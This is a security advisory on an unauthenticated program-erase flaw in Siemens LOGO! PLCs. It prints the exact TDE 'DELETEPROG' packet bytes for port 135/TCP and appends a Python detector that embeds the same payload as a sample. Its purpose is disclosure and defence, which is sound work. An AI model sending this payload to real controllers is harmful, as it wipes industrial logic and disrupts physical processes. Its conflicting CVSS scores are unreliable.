Talos Intelligence - TALOS-2020-1025
History: Jun 09, 2020 - 12:00 a.m.

Siemens LOGO! TDE service "DELETEPROG" Denial of Service Vulnerability

2020-06-09 00:00:00
Talos Intelligence
www.talosintelligence.com

CVSS2: 6.4 - AV:N/AC:L/Au:N/C:P/I:P/A:N
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE

CVSS3: 9.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE

EPSS: 0.001
Percentile: 48.3%

Summary

An exploitable denial of service vulnerability exists in the TDE service functionality of Siemens LOGO! 1.82.02, 12/24RCE Version 0BA and 230RCE Version 0BA. A specially crafted network request can cause stored information to be erased, resulting in a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.

Tested Versions

Siemens LOGO! 1.82.02
Siemens LOGO! 12/24RCE Version 0BA
Siemens LOGO! 230RCE Version 0BA

Product URLs

https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html

CVSSv3 Score

9.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H

CWE

CWE-306 - Missing Authentication for Critical Function

Details

Siemens LOGO! is an intelligent logic module (PLC) meant for automation projects such as industrial control systems, office/commercial and home settings. It is deployed worldwide and can be controlled remotely.

The LOGO System program can be completely erased through the TDE service on port 135/TCP using the "DELETEPROG" function. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/TCP. No user interaction is required to exploit this security vulnerability. The vulnerability impacts the integrity of the device. The payload used was the following:

Structure of payload message sent:

\x4B\xc0\x01\xe0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag
\x00\x00\x00\x00 # Context
\x00\x00\x00\x00 # Session
\x44\x45\x4c\x45 # DELETEPROG command
\x54\x45\x50\x52
\x4f\x47\x00\x00
\x00\x10\x27\x00 # Timeout
\x00

We were able to identify this vulnerability on firmware 1.82.02 (released on May 13, 2019).
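As an added illustration (not Talos or Siemens code), a small Python detector that parses the TDE request layout annotated above and flags a DELETEPROG command destined for 135/TCP, so a network sensor can alert on the unauthenticated erase request; the fixed field offsets and the reading of the fourth header byte as flags are assumptions taken from that annotation.

```python
import struct
from typing import Optional

# Field offsets follow the byte-by-byte annotation in the advisory above;
# treating them as fixed offsets (and the 4th header byte as flags) is an
# assumption made for this example, not Siemens documentation.
TDE_PORT = 135
SIGNATURE = 0x4B
MIN_LEN = 28  # header(4) + context(4) + session(4) + command(12) + timeout(4)

# Constructed sample: the DELETEPROG request exactly as laid out in the advisory.
SAMPLE_DELETEPROG = (
    b"\x4B\xc0\x01\xe0"    # signature, version, client version, flags
    b"\x00\x00\x00\x00"    # context
    b"\x00\x00\x00\x00"    # session
    b"DELETEPROG\x00\x00"  # command, NUL padded to 12 bytes
    b"\x00\x10\x27\x00"    # timeout
    b"\x00"
)


def parse_tde_request(data: bytes) -> Optional[dict]:
    """Split a TDE request into its fields; None if it does not match the layout."""
    if len(data) < MIN_LEN or data[0] != SIGNATURE:
        return None
    _sig, version, client_version, flags = struct.unpack_from("<BBBB", data, 0)
    context, session = struct.unpack_from("<II", data, 4)
    command = data[12:24].split(b"\x00", 1)[0].decode("ascii", errors="replace")
    return {
        "version": version,
        "client_version": client_version,
        "flags": flags,
        "context": context,
        "session": session,
        "command": command,
        "timeout_raw": data[24:28].hex(),  # endianness not stated; keep raw bytes
    }


def classify_tde_request(data: bytes, dst_port: int) -> str:
    """'alert' for a DELETEPROG request to the TDE port, 'info' for any other
    well-formed TDE request, 'ignore' for everything else."""
    if dst_port != TDE_PORT:
        return "ignore"
    fields = parse_tde_request(data)
    if fields is None:
        return "ignore"
    if fields["command"] == "DELETEPROG":
        return "alert"
    return "info"
```

Feeding the sample payload through classify_tde_request(SAMPLE_DELETEPROG, 135) yields "alert"; the same bytes toward any other port, or a truncated or non-TDE payload, yield "ignore".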

Timeline

2020-03-20 - Vendor Disclosure
2020-06-09 - Public Release
